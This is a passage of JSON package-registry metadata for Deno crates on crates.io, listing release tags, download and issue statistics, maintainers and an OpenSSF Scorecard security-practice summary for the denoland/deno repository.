eleases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T01:09:50.980Z","dependent_packages_count":0,"downloads":67222,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.74079484778963,"dependent_repos_count":21.17622246684705,"dependent_packages_count":28.041378175121658,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":47.98613182991945},"purl":"pkg:cargo/deno_crypto_provider","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_crypto_provider","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_crypto_provider","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_crypto_provider/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-06-23T09:38:42.648Z","updated_at":"2025-06-23T09:38:42.648Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-06-23T09:38:42.704Z","updated_at":"2025-06-23T09:38:42.704Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12089361,"name":"deno_bundle_runtime","ecosystem":"cargo","description":"Bundle runtime API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":43,"first_release_published_at":"2025-09-10T04:36:51.696Z","latest_release_published_at":"2026-08-06T11:48:02.386Z","latest_release_number":"0.44.0","last_synced_at":"2026-08-29T21:57:29.108Z","created_at":"2025-09-10T04:47:20.210Z","updated_at":"2026-08-29T21:57:29.109Z","registry_url":"https://crates.io/crates/deno_bundle_runtime/","install_command":"cargo install deno_bundle_runtime","documentation_url":"https://docs.rs/deno_bundle_runtime/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection 